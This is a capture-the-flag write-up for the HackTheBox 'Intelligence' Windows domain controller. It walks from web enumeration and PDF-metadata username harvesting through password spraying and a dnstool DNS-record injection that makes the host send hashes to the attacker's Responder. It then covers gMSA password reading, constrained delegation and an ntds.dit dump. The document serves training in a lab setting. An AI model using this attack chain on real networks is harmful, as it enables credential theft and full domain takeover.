# HackTheBox-Intelligence ## NMAP ```bash PORT STATE SERVICE REASON VERSION 53/tcp open domain? syn-ack ttl 127 | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0 |_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Intelligence 88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2021-07-05 20:55:03Z) 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn 389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc.intelligence.htb | Subject Alternative Name: othername:, DNS:dc.intelligence.htb | Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2021-04-19T00:43:16 | Not valid after: 2022-04-19T00:43:16 | MD5: 7767 9533 67fb d65d 6065 dff7 7ad8 3e88 | SHA-1: 1555 29d9 fef8 1aec 41b7 dab2 84d7 0f9d 30c7 bde7 | -----BEGIN CERTIFICATE----- | MIIF+zCCBOOgAwIBAgITcQAAAALMnIRQzlB+HAAAAAAAAjANBgkqhkiG9w0BAQsF 445/tcp open microsoft-ds? syn-ack ttl 127 464/tcp open kpasswd5? syn-ack ttl 127 593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc.intelligence.htb | Subject Alternative Name: othername:, DNS:dc.intelligence.htb |_ssl-date: 2021-07-05T20:58:07+00:00; +7h03m50s from scanner time. [113/292] 3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc.intelligence.htb | Subject Alternative Name: othername:, DNS:dc.intelligence.htb | Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2021-04-19T00:43:16 | Not valid after: 2022-04-19T00:43:16 | MD5: 7767 9533 67fb d65d 6065 dff7 7ad8 3e88 | SHA-1: 1555 29d9 fef8 1aec 41b7 dab2 84d7 0f9d 30c7 bde7 |_ssl-date: 2021-07-05T20:58:06+00:00; +7h03m50s from scanner time. 3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc.intelligence.htb | Subject Alternative Name: othername:, DNS:dc.intelligence.htb | Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2021-04-19T00:43:16 | Not valid after: 2022-04-19T00:43:16 | MD5: 7767 9533 67fb d65d 6065 dff7 7ad8 3e88 | SHA-1: 1555 29d9 fef8 1aec 41b7 dab2 84d7 0f9d 30c7 bde7 5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing 49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49677/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 49678/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49694/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49701/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 58957/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/ submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=7/5%Time=60E30E56%P=x86_64-pc-linux-gnu%r(DNSVe SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x SF:04bind\0\0\x10\0\x03"); Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 7h03m49s, deviation: 0s, median: 7h03m49s | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 2874/tcp): CLEAN (Timeout) | Check 2 (port 4953/tcp): CLEAN (Timeout) | Check 3 (port 29037/udp): CLEAN (Timeout) | Check 4 (port 21343/udp): CLEAN (Timeout) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2021-07-05T20:57:26 |_ start_date: N/A ``` From the scan we can see ports like 88, 389 which are for kerberos and ldap meaning that this windows machine is Active Directory also we can see the domain name which is `intelligence.htb0` ## PORT 80 On port 80 there's a simple web page

On scrolling down a little we can 2 documents on the web server , on hovering on it , it will show us the path of the pdf file but we can't access the directory listing `documents`

Scrolling further we can see an email adress with a domain `intelligence.htb` , we can further fuzz for subdomain as well so let's add it to our `/etc/hosts` file

On viewing the announcment document , it didn't have anything useful

Neither did the other document had anything in it

So I ran gobuster but , only found `documents` directory which is forbidden

One thing I note that I tried to change the year and month and I got a different pdf

So this means we need to fuzz for a pdf document by changing month and date so we need a wordlist of numbers in order to do that so I generated a two digit wordlist using `crunch`

Here I specified the min and max lenght to be 2 as we need the digits 01,02 and so on also I specified that it will be stop generating characters or numbers in this case if it reaches 31 so with `-e` we can do that. Now in `wfuzz` we can specify two wordlist to use and can utitlize them on different FUZZ parameter like we have the data format in year-month-day so we can FUZZ parameter like this `2020-FUZZ-FUZ2Z` This `FUZ2Z` will tell that use the second worlist you specify so I sorted out the dates and month wordlist

`dates.txt` will being from 01 and end at 31

`months.txt` will begin at 01 and end at 12

```bash wfuzz -c -w months.txt -w dates.txt --hl 29 -u http://intelligence.htb/documents/2020-FUZZ-F UZ2Z-upload.pdf ``` Here `--hl 29` is for hiding lines and we specify the numer 29 as on that number of lines we were getting 404 status code

I tried going through all the pdf's I can on web server but all contain some gibresh and wasn't interesting but when I ran `exiftool` on the pdf document and found who created this document

So on running exiftool on every document these are the users names I found

Copied those usernames in a text file that sorted out the names which were duplicates and put them in a new file

So we have a total of 26 users that we can check which one's are valid

But there's a problem we cannot proceed further until we know a valid credential so I moved back looking at those pdf files one by one which was real time consuming and it would have better if I had made a python script but anyways I found a password in one of the pdf files

Now we need to see whose password is this so we have a total of 26 users that we can brute force with this password , I will be using `crackmapexec` , you can use `kerbrute.py` which is a python script for kerbrute too so I'll show it using these two tools

But using `kerbrute.py` I was getting an error with "clock skew being great"

I found an article talking about clock skew https://techdirectarchive.com/2020/03/21/kerberos-error-clock-skew-too-great-while-getting-initial-credentials/ So the solution would be to set the correct time on DC or synchronize with DC's time zone so let's just try to login using `evil-winrm` since port 5985 is open on which WinRM runs

And it failed : ( So what we can do is to run `smbmap` to see if we can list shares

There's a `Users` shares and we can read it so probably from here we can get the `user.txt`

We can also get a powershell script from `IT` share

```powershell # Check web server status. Scheduled to run every 5min Import-Module ActiveDirectory foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") { try { $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials if(.StatusCode -ne 200) { Send-MailMessage -From 'Ted Graves ' -To 'Ted Graves ' -Subject "Host: $($record.Name) is down" } } catch {} } ``` Now what this powershell script is doing is that it's doing an ldap query for domain names and grabbing those domain names which have `web` in it and then it's going to make a request along with crdentials of `Ted.Graves` user but windows stores them in encrypted form so we won't get those in clear text . So I searched the LDAP query which is in this script on google which seems to be DNS delegation I further dug and found that it's actually a Unconstrained Delegation so I tried finding some scripts which would add a domain that points to our IP and somehow we listen for that using responder and get the creds >If a computer, with unconstrained delegations privileges, is compromised, an attacker must wait for a privileged user to authenticate on it (or force it) using Kerberos. The attacker service will receive a TGS containing the user's TGT. That TGT will be used by the service as a proof of identity to obtain access to a target service as the target user >In order to abuse the unconstrained delegations privileges of a computer account, an attacker must add his machine to the SPNs of the compromised account and add a DNS entry for it. This allows targets (like Domain Controllers and Exchange servers) to authenticate back to the attacker machine. This can be done with addspn, dnstool and krbrelayx (Python). https://cheatsheet.haax.fr/windows-systems/privilege-escalation/delegations/ https://github.com/dirkjanm/krbrelayx So we'll just use `dnstool` to add a domain name which will point to our IP address ```bash python3 dnstool.py -u intelligence.htb\\Tiffany.Molina -p NewIntelligenceCorpUser9876 -r web.intelligence.htb -a add -d YOUR_IP TARGET_IP ```

And after adding it we'll run `responder` , Responder an LLMNR, NBT-NS and MDNS poisoner. It will answer to specific NBT-NS (NetBIOS Name Service) It supports NTLMv1, NTLMv2 hashes

Boom ,we got the the NTLMv2 hash , now we need to crack this hash , I'll use `hashcat`

After getting the password so I thought of maybe running `python bloodhound injestor` through which we can enumerate the AD and then pass those json files to `bloohound`

Start `neo4j` and bloodhound ,I have configured bloodhound in a way that it doesn't ask for password you can search on how to do it as well anyways launching bloodhound

Make an archive of those files and then drag and drop to GUI

Now we can run `Shortest Path to Unconstrained Delegation Systems` query

We can see that the user `Ted.Graves` is a member of ITSupport group further more that group has access to `ReadGSMAPPassword` through which can get to Service account `SVC_INT` We can read about this as well

Further we can read about `AllowedToDelegate`

So the first step is to somehow abuse reading GMSA password for that I searched for a python script

After running this script we get a hash for service account

We can now abuse it using `Constrained Delegtaion`

I followed this command

But it throws again that clock skew error, so I added `dc.intelligence.htb` in my `/etc/hosts` file and did `ntpdate dc.intelligence,htb` so that my machine gets synced with DC's time zone

We got the adminstarator ticket , now we need to export a variable named `KRB5CCNAME `

And boom , we hit the gold mine dumping `ntds.dit` from domain controller , now we can use `evil-winrm` to log in since `WinRM` is running on port 5985

Note that you can revert back to your time zone with `ntpdate ntp.ubuntu.com`